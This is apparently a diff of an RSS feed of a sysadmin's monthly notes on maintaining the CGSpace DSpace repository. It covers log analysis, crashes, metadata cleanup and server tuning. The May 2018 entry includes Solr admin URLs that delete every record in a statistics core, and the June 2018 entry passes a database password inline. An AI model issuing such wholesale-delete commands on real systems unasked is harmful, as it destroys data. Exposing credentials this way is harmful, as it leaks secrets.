+      <guid>https://alanorth.github.io/cgspace-notes/2019-03/</guid>
+      <description>&lt;h2 id=&#34;2019-03-01&#34;&gt;2019-03-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I checked IITA&amp;rsquo;s 259 Feb 14 records from last month for duplicates using Atmire&amp;rsquo;s Duplicate Checker on a fresh snapshot of CGSpace on my local machine and everything looks good&lt;/li&gt;
+&lt;li&gt;I am now only waiting to hear from her about where the items should go, though I assume Journal Articles go to IITA Journal Articles collection, etc&amp;hellip;&lt;/li&gt;
+&lt;li&gt;Looking at the other half of Udana&amp;rsquo;s WLE records from 2018-11
+&lt;ul&gt;
+&lt;li&gt;I finished the ones for Restoring Degraded Landscapes (RDL), but these are for Variability, Risks and Competing Uses (VRC)&lt;/li&gt;
+&lt;li&gt;I did the usual cleanups for whitespace, added regions where they made sense for certain countries, cleaned up the DOI link formats, added rights information based on the publications page for a few items&lt;/li&gt;
+&lt;li&gt;Most worryingly, there are encoding errors in the abstracts for eleven items, for example:&lt;/li&gt;
+&lt;li&gt;68.15% � 9.45 instead of 68.15% ± 9.45&lt;/li&gt;
+&lt;li&gt;2003�2013 instead of 2003–2013&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I think I will need to ask Udana to re-copy and paste the abstracts with more care using Google Docs&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>February, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-02/</link>
+      <pubDate>Fri, 01 Feb 2019 21:37:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-02/</guid>
+      <description>&lt;h2 id=&#34;2019-02-01&#34;&gt;2019-02-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!&lt;/li&gt;
+&lt;li&gt;The top IPs before, during, and after this latest alert tonight were:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &amp;#34;01/Feb/2019:(17|18|19|20|21)&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
+    245 207.46.13.5
+    332 54.70.40.11
+    385 5.143.231.38
+    405 207.46.13.173
+    405 207.46.13.75
+   1117 66.249.66.219
+   1121 35.237.175.180
+   1546 5.9.6.51
+   2474 45.5.186.2
+   5490 85.25.237.71
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;&lt;code&gt;85.25.237.71&lt;/code&gt; is the &amp;ldquo;Linguee Bot&amp;rdquo; that I first saw last month&lt;/li&gt;
+&lt;li&gt;The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase&lt;/li&gt;
+&lt;li&gt;There were just over 3 million accesses in the nginx logs last month:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# time zcat --force /var/log/nginx/* | grep -cE &amp;#34;[0-9]{1,2}/Jan/2019&amp;#34;
+3018243
+
+real    0m19.873s
+user    0m22.203s
+sys     0m1.979s
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>January, 2019</title>
+      <link>https://alanorth.github.io/cgspace-notes/2019-01/</link>
+      <pubDate>Wed, 02 Jan 2019 09:48:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2019-01/</guid>
+      <description>&lt;h2 id=&#34;2019-01-02&#34;&gt;2019-01-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning&lt;/li&gt;
+&lt;li&gt;I don&amp;rsquo;t see anything interesting in the web server logs around that time though:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &amp;#34;02/Jan/2019:0(1|2|3)&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
+     92 40.77.167.4
+     99 210.7.29.100
+    120 38.126.157.45
+    177 35.237.175.180
+    177 40.77.167.32
+    216 66.249.75.219
+    225 18.203.76.93
+    261 46.101.86.248
+    357 207.46.13.1
+    903 54.70.40.11
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>December, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-12/</link>
+      <pubDate>Sun, 02 Dec 2018 02:09:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-12/</guid>
+      <description>&lt;h2 id=&#34;2018-12-01&#34;&gt;2018-12-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Switch CGSpace (linode18) to use OpenJDK instead of Oracle JDK&lt;/li&gt;
+&lt;li&gt;I manually installed OpenJDK, then removed Oracle JDK, then re-ran the &lt;a href=&#34;http://github.com/ilri/rmg-ansible-public&#34;&gt;Ansible playbook&lt;/a&gt; to update all configuration files, etc&lt;/li&gt;
+&lt;li&gt;Then I ran all system updates and restarted the server&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2018-12-02&#34;&gt;2018-12-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I noticed that there is another issue with PDF thumbnails on CGSpace, and I see there was another &lt;a href=&#34;https://usn.ubuntu.com/3831-1/&#34;&gt;Ghostscript vulnerability last week&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>November, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-11/</link>
+      <pubDate>Thu, 01 Nov 2018 16:41:30 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-11/</guid>
+      <description>&lt;h2 id=&#34;2018-11-01&#34;&gt;2018-11-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Finalize AReS Phase I and Phase II ToRs&lt;/li&gt;
+&lt;li&gt;Send a note about my &lt;a href=&#34;https://github.com/ilri/dspace-statistics-api&#34;&gt;dspace-statistics-api&lt;/a&gt; to the dspace-tech mailing list&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2018-11-03&#34;&gt;2018-11-03&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage&lt;/li&gt;
+&lt;li&gt;Today these are the top 10 IPs:&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>October, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-10/</link>
+      <pubDate>Mon, 01 Oct 2018 22:31:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-10/</guid>
+      <description>&lt;h2 id=&#34;2018-10-01&#34;&gt;2018-10-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Phil Thornton got an ORCID identifier so we need to add it to the list on CGSpace and tag his existing items&lt;/li&gt;
+&lt;li&gt;I created a GitHub issue to track this &lt;a href=&#34;https://github.com/ilri/DSpace/issues/389&#34;&gt;#389&lt;/a&gt;, because I&amp;rsquo;m super busy in Nairobi right now&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>September, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-09/</link>
+      <pubDate>Sun, 02 Sep 2018 09:55:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-09/</guid>
+      <description>&lt;h2 id=&#34;2018-09-02&#34;&gt;2018-09-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;New &lt;a href=&#34;https://jdbc.postgresql.org/documentation/changelog.html#version_42.2.5&#34;&gt;PostgreSQL JDBC driver version 42.2.5&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;I&amp;rsquo;ll update the DSpace role in our &lt;a href=&#34;https://github.com/ilri/rmg-ansible-public&#34;&gt;Ansible infrastructure playbooks&lt;/a&gt; and run the updated playbooks on CGSpace and DSpace Test&lt;/li&gt;
+&lt;li&gt;Also, I&amp;rsquo;ll re-run the &lt;code&gt;postgresql&lt;/code&gt; tasks because the custom PostgreSQL variables are dynamic according to the system&amp;rsquo;s RAM, and we never re-ran them after migrating to larger Linodes last month&lt;/li&gt;
+&lt;li&gt;I&amp;rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I&amp;rsquo;m getting those autowire errors in Tomcat 8.5.30 again:&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>August, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-08/</link>
+      <pubDate>Wed, 01 Aug 2018 11:52:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-08/</guid>
+      <description>&lt;h2 id=&#34;2018-08-01&#34;&gt;2018-08-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;DSpace Test had crashed at some point yesterday morning and I see the following in &lt;code&gt;dmesg&lt;/code&gt;:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[Tue Jul 31 00:00:41 2018] Out of memory: Kill process 1394 (java) score 668 or sacrifice child
+[Tue Jul 31 00:00:41 2018] Killed process 1394 (java) total-vm:15601860kB, anon-rss:5355528kB, file-rss:0kB, shmem-rss:0kB
+[Tue Jul 31 00:00:41 2018] oom_reaper: reaped process 1394 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;Judging from the time of the crash it was probably related to the Discovery indexing that starts at midnight&lt;/li&gt;
+&lt;li&gt;From the DSpace log I see that eventually Solr stopped responding, so I guess the &lt;code&gt;java&lt;/code&gt; process that was OOM killed above was Tomcat&amp;rsquo;s&lt;/li&gt;
+&lt;li&gt;I&amp;rsquo;m not sure why Tomcat didn&amp;rsquo;t crash with an OutOfMemoryError&amp;hellip;&lt;/li&gt;
+&lt;li&gt;Anyways, perhaps I should increase the JVM heap from 5120m to 6144m like we did a few months ago when we tried to run the whole CGSpace Solr core&lt;/li&gt;
+&lt;li&gt;The server only has 8GB of RAM so we&amp;rsquo;ll eventually need to upgrade to a larger one because we&amp;rsquo;ll start starving the OS, PostgreSQL, and command line batch processes&lt;/li&gt;
+&lt;li&gt;I ran all system updates on DSpace Test and rebooted it&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>July, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-07/</link>
+      <pubDate>Sun, 01 Jul 2018 12:56:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-07/</guid>
+      <description>&lt;h2 id=&#34;2018-07-01&#34;&gt;2018-07-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I want to upgrade DSpace Test to DSpace 5.8 so I took a backup of its current database just in case:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-07-01.backup dspace
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;During the &lt;code&gt;mvn package&lt;/code&gt; stage on the 5.8 branch I kept getting issues with java running out of memory:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;There is insufficient memory for the Java Runtime Environment to continue.
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>June, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-06/</link>
+      <pubDate>Mon, 04 Jun 2018 19:49:54 -0700</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-06/</guid>
+      <description>&lt;h2 id=&#34;2018-06-04&#34;&gt;2018-06-04&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Test the &lt;a href=&#34;https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560&#34;&gt;DSpace 5.8 module upgrades from Atmire&lt;/a&gt; (&lt;a href=&#34;https://github.com/ilri/DSpace/pull/378&#34;&gt;#378&lt;/a&gt;)
+&lt;ul&gt;
+&lt;li&gt;There seems to be a problem with the CUA and L&amp;amp;R versions in &lt;code&gt;pom.xml&lt;/code&gt; because they are using SNAPSHOT and it doesn&amp;rsquo;t build&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I added the new CCAFS Phase II Project Tag &lt;code&gt;PII-FP1_PACCA2&lt;/code&gt; and merged it into the &lt;code&gt;5_x-prod&lt;/code&gt; branch (&lt;a href=&#34;https://github.com/ilri/DSpace/pull/379&#34;&gt;#379&lt;/a&gt;)&lt;/li&gt;
+&lt;li&gt;I proofed and tested the ILRI author corrections that Peter sent back to me this week:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -f dc.contributor.author -t correct -m 3 -n
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in &lt;a href=&#34;https://alanorth.github.io/cgspace-notes/cgspace-notes/2018-03/&#34;&gt;March, 2018&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;Time to index ~70,000 items on CGSpace:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b                                  
+
+real    74m42.646s
+user    8m5.056s
+sys     2m7.289s
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>May, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-05/</link>
+      <pubDate>Tue, 01 May 2018 16:43:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-05/</guid>
+      <description>&lt;h2 id=&#34;2018-05-01&#34;&gt;2018-05-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I cleared the Solr statistics core on DSpace Test by issuing two commands directly to the Solr admin interface:
+&lt;ul&gt;
+&lt;li&gt;http://localhost:3000/solr/statistics/update?stream.body=%3Cdelete%3E%3Cquery%3E*:*%3C/query%3E%3C/delete%3E&lt;/li&gt;
+&lt;li&gt;http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Then I reduced the JVM heap size from 6144 back to 5120m&lt;/li&gt;
+&lt;li&gt;Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked the &lt;a href=&#34;https://github.com/ilri/rmg-ansible-public&#34;&gt;Ansible infrastructure scripts&lt;/a&gt; to support hosts choosing which distribution they want to use&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>April, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-04/</link>
+      <pubDate>Sun, 01 Apr 2018 16:13:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-04/</guid>
+      <description>&lt;h2 id=&#34;2018-04-01&#34;&gt;2018-04-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I tried to test something on DSpace Test but noticed that it&amp;rsquo;s down since god knows when&lt;/li&gt;
+&lt;li&gt;Catalina logs at least show some memory errors yesterday:&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>March, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-03/</link>
+      <pubDate>Fri, 02 Mar 2018 16:07:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-03/</guid>
+      <description>&lt;h2 id=&#34;2018-03-02&#34;&gt;2018-03-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Export a CSV of the IITA community metadata for Martin Mueller&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>February, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-02/</link>
+      <pubDate>Thu, 01 Feb 2018 16:28:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-02/</guid>
+      <description>&lt;h2 id=&#34;2018-02-01&#34;&gt;2018-02-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Peter gave feedback on the &lt;code&gt;dc.rights&lt;/code&gt; proof of concept that I had sent him last week&lt;/li&gt;
+&lt;li&gt;We don&amp;rsquo;t need to distinguish between internal and external works, so that makes it just a simple list&lt;/li&gt;
+&lt;li&gt;Yesterday I figured out how to monitor DSpace sessions using JMX&lt;/li&gt;
+&lt;li&gt;I copied the logic in the &lt;code&gt;jmx_tomcat_dbpools&lt;/code&gt; provided by Ubuntu&amp;rsquo;s &lt;code&gt;munin-plugins-java&lt;/code&gt; package and used the stuff I discovered about JMX &lt;a href=&#34;https://alanorth.github.io/cgspace-notes/cgspace-notes/2018-01/&#34;&gt;in 2018-01&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>January, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-01/</link>
+      <pubDate>Tue, 02 Jan 2018 08:35:54 -0800</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-01/</guid>
+      <description>&lt;h2 id=&#34;2018-01-02&#34;&gt;2018-01-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Uptime Robot noticed that CGSpace went down and up a few times last night, for a few minutes each time&lt;/li&gt;
+&lt;li&gt;I didn&amp;rsquo;t get any load alerts from Linode and the REST and XMLUI logs don&amp;rsquo;t show anything out of the ordinary&lt;/li&gt;
+&lt;li&gt;The nginx logs show HTTP 200s until &lt;code&gt;02/Jan/2018:11:27:17 +0000&lt;/code&gt; when Uptime Robot got an HTTP 500&lt;/li&gt;
+&lt;li&gt;In dspace.log around that time I see many errors like &amp;ldquo;Client closed the connection before file download was complete&amp;rdquo;&lt;/li&gt;
+&lt;li&gt;And just before that I see this:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;Caused by: org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-980] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:50; busy:50; idle:0; lastwait:5000].
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;Ah hah! So the pool was actually empty!&lt;/li&gt;
+&lt;li&gt;I need to increase that, let&amp;rsquo;s try to bump it up from 50 to 75&lt;/li&gt;
+&lt;li&gt;After that one client got an HTTP 499 but then the rest were HTTP 200, so I don&amp;rsquo;t know what the hell Uptime Robot saw&lt;/li&gt;
+&lt;li&gt;I notice this error quite a few times in dspace.log:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
+org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &amp;#39;dateIssued_keyword:[1976+TO+1979]&amp;#39;: Encountered &amp;#34; &amp;#34;]&amp;#34; &amp;#34;] &amp;#34;&amp;#34; at line 1, column 32.
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;And there are many of these errors every day for the past month:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ grep -c &amp;#34;Error while searching for sidebar facets&amp;#34; dspace.log.*
+dspace.log.2017-11-21:4
+dspace.log.2017-11-22:1
+dspace.log.2017-11-23:4
+dspace.log.2017-11-24:11
+dspace.log.2017-11-25:0
+dspace.log.2017-11-26:1
+dspace.log.2017-11-27:7
+dspace.log.2017-11-28:21
+dspace.log.2017-11-29:31
+dspace.log.2017-11-30:15
+dspace.log.2017-12-01:15
+dspace.log.2017-12-02:20
+dspace.log.2017-12-03:38
+dspace.log.2017-12-04:65
+dspace.log.2017-12-05:43
+dspace.log.2017-12-06:72
+dspace.log.2017-12-07:27
+dspace.log.2017-12-08:15
+dspace.log.2017-12-09:29
+dspace.log.2017-12-10:35
+dspace.log.2017-12-11:20
+dspace.log.2017-12-12:44
+dspace.log.2017-12-13:36
+dspace.log.2017-12-14:59
+dspace.log.2017-12-15:104
+dspace.log.2017-12-16:53
+dspace.log.2017-12-17:66
+dspace.log.2017-12-18:83
+dspace.log.2017-12-19:101
+dspace.log.2017-12-20:74
+dspace.log.2017-12-21:55
+dspace.log.2017-12-22:66
+dspace.log.2017-12-23:50
+dspace.log.2017-12-24:85
+dspace.log.2017-12-25:62
+dspace.log.2017-12-26:49
+dspace.log.2017-12-27:30
+dspace.log.2017-12-28:54
+dspace.log.2017-12-29:68
+dspace.log.2017-12-30:89
+dspace.log.2017-12-31:53
+dspace.log.2018-01-01:45
+dspace.log.2018-01-02:34
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;Danny wrote to ask for help renewing the wildcard ilri.org certificate and I advised that we should probably use Let&amp;rsquo;s Encrypt if it&amp;rsquo;s just a handful of domains&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>December, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-12/</link>
+      <pubDate>Fri, 01 Dec 2017 13:53:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-12/</guid>
+      <description>&lt;h2 id=&#34;2017-12-01&#34;&gt;2017-12-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Uptime Robot noticed that CGSpace went down&lt;/li&gt;
+&lt;li&gt;The logs say &amp;ldquo;Timeout waiting for idle object&amp;rdquo;&lt;/li&gt;
+&lt;li&gt;PostgreSQL activity says there are 115 connections currently&lt;/li&gt;
+&lt;li&gt;The list of connections to XMLUI and REST API for today:&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>November, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-11/</link>
+      <pubDate>Thu, 02 Nov 2017 09:37:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-11/</guid>
+      <description>&lt;h2 id=&#34;2017-11-01&#34;&gt;2017-11-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;The CORE developers responded to say they are looking into their bot not respecting our robots.txt&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2017-11-02&#34;&gt;2017-11-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Today there have been no hits by CORE and no alerts from Linode (coincidence?)&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# grep -c &amp;#34;CORE&amp;#34; /var/log/nginx/access.log
+0
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;Generate list of authors on CGSpace for Peter to go through and correct:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &amp;#39;contributor&amp;#39; and qualifier = &amp;#39;author&amp;#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
+COPY 54701
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>October, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-10/</link>
+      <pubDate>Sun, 01 Oct 2017 08:07:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-10/</guid>
+      <description>&lt;h2 id=&#34;2017-10-01&#34;&gt;2017-10-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Peter emailed to point out that many items in the &lt;a href=&#34;https://cgspace.cgiar.org/handle/10568/2703&#34;&gt;ILRI archive collection&lt;/a&gt; have multiple handles:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;There appears to be a pattern but I&amp;rsquo;ll have to look a bit closer and try to clean them up automatically, either in SQL or in OpenRefine&lt;/li&gt;
+&lt;li&gt;Add Katherine Lutz to the groups for content submission and edit steps of the CGIAR System collections&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>CGIAR Library Migration</title>
+      <link>https://alanorth.github.io/cgspace-notes/cgiar-library-migration/</link>
+      <pubDate>Mon, 18 Sep 2017 16:38:35 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/cgiar-library-migration/</guid>
+      <description>&lt;p&gt;Rough notes for importing the CGIAR Library content. It was decided that this content would go to a new top-level community called &lt;em&gt;CGIAR System Organization&lt;/em&gt;.&lt;/p&gt;</description>
+    </item>
+    
+    <item>
+      <title>September, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-09/</link>
+      <pubDate>Thu, 07 Sep 2017 16:54:52 +0700</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-09/</guid>
+      <description>&lt;h2 id=&#34;2017-09-06&#34;&gt;2017-09-06&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Linode sent an alert that CGSpace (linode18) was using 261% CPU for the past two hours&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2017-09-07&#34;&gt;2017-09-07&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Ask Sisay to clean up the WLE approvers a bit, as Marianne&amp;rsquo;s user account is both in the approvers step as well as the group&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>August, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-08/</link>
+      <pubDate>Tue, 01 Aug 2017 11:51:52 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-08/</guid>
+      <description>&lt;h2 id=&#34;2017-08-01&#34;&gt;2017-08-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Linode sent an alert that CGSpace (linode18) was using 350% CPU for the past two hours&lt;/li&gt;
+&lt;li&gt;I looked in the Activity pane of the Admin Control Panel and it seems that Google, Baidu, Yahoo, and Bing are all crawling with massive numbers of bots concurrently (~100 total, mostly Baidu and Google)&lt;/li&gt;
+&lt;li&gt;The good thing is that, according to &lt;code&gt;dspace.log.2017-08-01&lt;/code&gt;, they are all using the same Tomcat session&lt;/li&gt;
+&lt;li&gt;This means our Tomcat Crawler Session Valve is working&lt;/li&gt;
+&lt;li&gt;But many of the bots are browsing dynamic URLs like:
+&lt;ul&gt;
+&lt;li&gt;/handle/10568/3353/discover&lt;/li&gt;
+&lt;li&gt;/handle/10568/16510/browse&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;The &lt;code&gt;robots.txt&lt;/code&gt; only blocks the top-level &lt;code&gt;/discover&lt;/code&gt; and &lt;code&gt;/browse&lt;/code&gt; URLs&amp;hellip; we will need to find a way to forbid them from accessing these!&lt;/li&gt;
+&lt;li&gt;Relevant issue from DSpace Jira (semi resolved in DSpace 6.0): &lt;a href=&#34;https://jira.duraspace.org/browse/DS-2962&#34;&gt;https://jira.duraspace.org/browse/DS-2962&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;It turns out that we&amp;rsquo;re already adding the &lt;code&gt;X-Robots-Tag &amp;quot;none&amp;quot;&lt;/code&gt; HTTP header, but this only forbids the search engine from &lt;em&gt;indexing&lt;/em&gt; the page, not crawling it!&lt;/li&gt;
+&lt;li&gt;Also, the bot has to successfully browse the page first so it can receive the HTTP header&amp;hellip;&lt;/li&gt;
+&lt;li&gt;We might actually have to &lt;em&gt;block&lt;/em&gt; these requests with HTTP 403 depending on the user agent&lt;/li&gt;
+&lt;li&gt;Abenet pointed out that the CGIAR Library Historical Archive collection I sent July 20th only had ~100 entries, instead of 2415&lt;/li&gt;
+&lt;li&gt;This was due to newline characters in the &lt;code&gt;dc.description.abstract&lt;/code&gt; column, which caused OpenRefine to choke when exporting the CSV&lt;/li&gt;
+&lt;li&gt;I exported a new CSV from the collection on DSpace Test and then manually removed the characters in vim using &lt;code&gt;g/^$/d&lt;/code&gt;&lt;/li&gt;
+&lt;li&gt;Then I cleaned up the author authorities and HTML characters in OpenRefine and sent the file back to Abenet&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>July, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-07/</link>
+      <pubDate>Sat, 01 Jul 2017 18:03:52 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-07/</guid>
